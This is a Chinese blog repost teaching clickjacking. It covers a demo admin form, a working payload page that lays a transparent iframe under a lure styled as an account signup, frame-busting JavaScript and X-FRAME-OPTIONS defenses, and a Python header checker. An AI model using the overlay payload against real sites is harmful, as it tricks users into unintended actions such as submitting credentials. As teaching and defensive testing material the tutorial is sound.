点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

最新推荐文章于 2024-04-24 15:39:18 发布
最新推荐文章于 2024-04-24 15:39:18 发布
阅读量295 收藏 3
点赞数
文章标签: python php
原文链接:http://www.cnblogs.com/haq5201314/p/8992273.html
版权

前言:

放假了,上个星期刚刚学习完点击劫持漏洞。没来的及写笔记,今天放学总结了一下

并写了一个检测点击劫持的脚本。点击劫持脚本说一下哈。= =原本是打算把网站源码

中的js也爬出来将一些防御的代码匹配一下。可惜,爬出来的js链接乱的一匹。弄了很久

也很乱。所以就没有匹配js文件了。

 

漏洞介绍:

漏洞名称:点击劫持漏洞(Clicking hijacking)

级别:中级

漏洞用于场景:钓鱼,欺骗。

《黑客攻防之浏览器篇》里有详细的利用教程。

里面所介绍的工具做出来的payload能以假乱真

攻击手法:在一个页面的中嵌入一个iframe标签,放入诱惑信息,引诱用户点击

 

漏洞复现:

index.html

<html>
<head>
  <title>后台管理员添加</title>
  <style>
  body{ background-repeat: no-repeat;background-size: 100% 100%;background-attachment: fixed;}
  h2{ color:blue;text-align: center;}
  </style>
</head>
<body background="bei.jpg">
  <h2>管理员添加</h2>
  <div style="text-align:center;">
    <form action="x.php" method="POST">
      <input type="text" required><br><br>
      <input type="password" required><br>
      <input type="submit" value="提交">
  </div>
</body>
</html>

 

 

payload

将opacity设置为0.3可以看见你所填的

<html>
<head>
  <title>点击劫持</title>
  <style>
  iframe{ position: absolute;z-index: 2;top: 0px;left: 0px;width: 1800px;height: 900px;opacity: 0;filter: alpha(opacity=0);}
  button{ position: absolute;z-index: 1;top: 125px;left: 878px;}
  input{ position: absolute;z-index: 1;top: 65px;left: 820px;}
  body{ background-repeat:no-repeat;}
  </style>
</head>
<body>
  <div style="text-align:center">
    <h2>靓丽美女账号注册</h2>
  </div>
     <input type="text">
  <div style="position: absolute;z-index: 1;top: 43px;left: 5px;">
     <input type="text">
</div>
  <button>注册</button>
  <iframe src="http://127.0.0.1/jiechi/index.html"></iframe>
</body>
</html>

加上背景

 

漏洞防御:

1.加入js脚本防御

目前最好的js的防御方案为:

<head>
<style>
 body { display : none;} 
</style>
</head>
<body>
<script>
if (self == top) {    
var theBody = document.getElementsByTagName('body')[0];    
theBody.style.display = "block";
} 
else 
{   
 top.location = self.location;
}
</script>

2.添加X-FRAME-OPTIONS头进行防御

X-FRAME-OPTIONS头是微软开发的,使用该头后禁止页面被iframe嵌套

 

防御结果

将index.html改为index.php,代码改为

X-FRAME-OPTIONS头使用说明:
1.DENY  拒绝任何域加载
2.SAMEORIHIN  同源下可以加载
3.ALLOW-FROM 可以定义允许frame加载的页面

 

<?php
header ( "X-FRAME-OPTIONS:DENY");
?>
<html>
<head>
  <title>后台管理员添加</title>
  <style>
  body{ background-repeat: no-repeat;background-size: 100% 100%;background-attachment: fixed;}
  h2{ color:blue;text-align: center;}
  </style>
</head>
<body background="bei.jpg">
  <h2>管理员添加</h2>
  <div style="text-align:center;">
    <form action="x.php" method="POST">
      <input type="text" required><br><br>
      <input type="password" required><br>
      <input type="submit" value="提交">
  </div>
</body>
</html>

将payload.html的opacity设置为0.3

 

 可以看到已经嵌套不了了。

 

检测是否有点击劫持漏洞的脚本

原理直接判断是否有X-FROM-OPTIONS头。如果没有就有点击劫持漏洞

并提醒使用者可能有js脚本防御请自行测试。

代码:

import requests,tqdm,time,optparse
def main():
    usage='dianjijieci.py [-u url]'
    parser=optparse.OptionParser(usage)
    parser.add_option('-u',dest='url',help='The web site to be tested URL')
    (options,args)=parser.parse_args()
    if options.url:
        url=options.url
        jiechi(url)
    else:
        parser.print_help()
def jiechi(url):
    urls="{}".format(url)
    headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
    reqst=requests.get(url=urls,headers=headers,timeout=6)
    if reqst.status_code == 200:
      print('[+]Target stability')
      try:
          hea=reqst.headers
          print(hea['X-FRAME-OPTIONS'])
          print('[n]X-FRAME-OPTIONS header, no click hijacking vulnerability can be used')
      except:
          print('[+]There is no X-FRAME-OPTIONS header. There is a clicking hijacking vulnerability')
          print('[!]Remind:It may be a defense against JS. Please test it yourself')
    else:
        print('[n]bjective instability')

if __name__ == '__main__':
    main()

测试结果

 

转载于:https://www.cnblogs.com/haq5201314/p/8992273.html

weixin_30682415
关注
Click Jacking点击劫持漏洞验证
afei001
02-09 1286
目录 1.前言 2.漏洞原理 3.漏洞验证 4.漏洞利用 5.漏洞修复 6.ClickJacking漏洞测试脚本Python) 1.前言 前几天在对网站进行安全性测试时,发现存在ClickJacking点击劫持漏洞。AWVS扫出来报的是地危。利用的成本也不是很高,了解该漏洞的原理之后,我认为是个中危漏洞。 afei 服务器没有返回X-Frame-Options报头,这意味着该网站可能面临点击劫持攻击的风险。X-Frame-Options HTTP响...
点击劫持”测试「Clickjacking Test」-crx插件
03-09
通过Offcon Info Security进行的Clickjacking测试。 此chrome扩展程序将检查是否可以对当前网页进行格式化,甚至生成用于安全报告的概念证明HTML。 支持语言:English
PortSwigger 点击劫持(Clickjacking)
weixin_42451330的博客
03-02 748
本文介绍PortSwigger靶场 点击劫持 (Clickjacking)漏洞,包括Clickjacking介绍、利用方式、防御方式等。如有疑问欢迎私聊。
【burpsuite安全练兵场-客户端14】点击劫持-5个实验(全)
wangluoanquan111的博客
01-26 1961
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-
点击劫持漏洞修复(前端、后端)
weixin_42787408的博客
09-30 2410
点击劫持是一种视觉上的欺骗手段,攻击者通过使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作。
clickjack:一个检查子域是否有点击劫持攻击的简单工具
03-30
旨在检查网站是否容易受到点击劫持python脚本,并将结果保存到Vulnerable.txt文件中。 用法 python3 clickjack.py 例子 输入 python3 clickjack.py sites.txt sites.txt www.bugcrowd.com www.srsecure.xyz ...
Python中的10个常见安全漏洞及修复方法
gaojian5422的博客
02-28 2150
Python中的10个常见安全漏洞及修复方法
Linux权限提升:Python劫持
beetxia的博客
07-02 496
在这篇文章中,我们将介绍一些在基于Linux的设备上通过利用Python库和脚本提升权限的方法。 1.介绍 一般来说,当攻击者处于有python文件的环境中,可以用来提升其访问权限的方式比较有限。本文将介绍利用写权限、sudo权限和编辑Path变量,这三种提权方式。 为了方便演示,我们先创建一个导入一些库的示例脚本。在实际情况中,这可能是个一般的python脚本或是一个开发人员正在进行的项目。在CTF比赛中,可能很容易找到一个包含与此相类似的脚本。我们创建的示例脚本中,首先导入webbrowser模块
从零开始学习软件漏洞挖掘系列教程第三篇:利用SEH机制Exploit it.pdf
01-31
GS保护通过在返回地址和本地变量之间插入一个特殊的“安全Cookie”,如果攻击者试图覆盖返回地址,这个Cookie通常会被破坏,从而阻止漏洞的利用。然而,SEH的异常处理机制可以被用来绕过GS保护。通过精心设计的数据...
点击劫持漏洞原理和复现
weixin_54438700的博客
05-20 4247
一、漏洞原理 点击劫持(Clickbandit),主要是利用HTML中iframe便签可以透明的属性进行利用攻击,其原理是通过在原本的网页上覆盖透明的框架并使受害者在不知情的情况下进行点击漏洞主要是由于未对referer字段来源进行检验。常常配合csrf和xss。 图中,攻击者在原本网站上覆盖一个透明框架,受害者正常访问网站A,就会点击到这个透明框架B。攻击者常常利用该漏洞诱导受害者点击关键位置进行一些操作,比如转账、购买等危险操作。 二、漏洞复现 1.借助burpsuite工具,选择Clickb
点击劫持漏洞修复
YXWik的博客
05-21 1614
点击劫持是一种视觉上的欺骗手段,攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击了透明的iframe页面。通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上,攻击者常常配合社工手段完成攻击。 解决方案: 在nginx配置中的location 下添加 add_header X-Frame-Options SAMEORIGIN; ...
点击劫持漏洞
qq_40679463的博客
12-09 1021
点击劫持
WEB安全基础-点击劫持漏洞基础
IT1995的博客
01-21 5700
点击劫持漏洞 点击劫持一个其他的网站,用iframe标签,”http://xxx.xxx.xxx”> Html,body,iframe{ Display:block; 此处可以设为null Height:100%; Width:100%; Margin:0; margin和padding是元素间距离 Padding:0; Border:nonne; 去掉边框 } 点击劫持
11、点击劫持漏洞
lqyzkn的博客
07-21 1175
内容 前置知识 实例讲解 概念及原理分析 1. 前置知识 iframe:可以创建包含另外一个文档的内联框架。 2、实例讲解 3、概念及原理分析 点击劫持:通过覆盖不可见的框架误导受害者点击而造成的攻击行为。 点击劫持是如何构造的呢? 具体实现如下: 这里小白我初步介绍了点击劫持漏洞,更深层次的内容我会进一步学习的 ...
点击劫持漏洞(ClickJacking)
最新发布
墨痕诉清风的博客
04-24 124
官方定义:点击劫持(也称为界面伪装攻击或UI矫正攻击)是一种网络攻击手段,通过篡改网页或利用其他技术手段,使用户在点击某个链接时,重定向到攻击者控制的网页或执行恶意操作,从而获取用户的隐私信息或进行其他非法活动。通过调整iframe页面的位置,可以诱使用户恰好点击iframe页面的一些功能性按钮上,导致被劫持。创建虚假页面,iframe src=嵌入要欺骗点击的页面,这里要对一下坐标,让虚假的按钮可正好点击到用户要被欺骗的页面按钮。SAMEORIGIN:frame页面的地址只能为同源域名下的页面。
深入探讨Python与Django在Web漏洞挖掘中的应用
在这份资源中,将详细讲解使用Python和Django框架搭建一个Web漏洞挖掘平台的整个流程。用户可以学习如何利用Django的MVC(模型-视图-控制器)架构来构建应用程序的后端逻辑,以及如何创建数据库模型来存储和管理漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值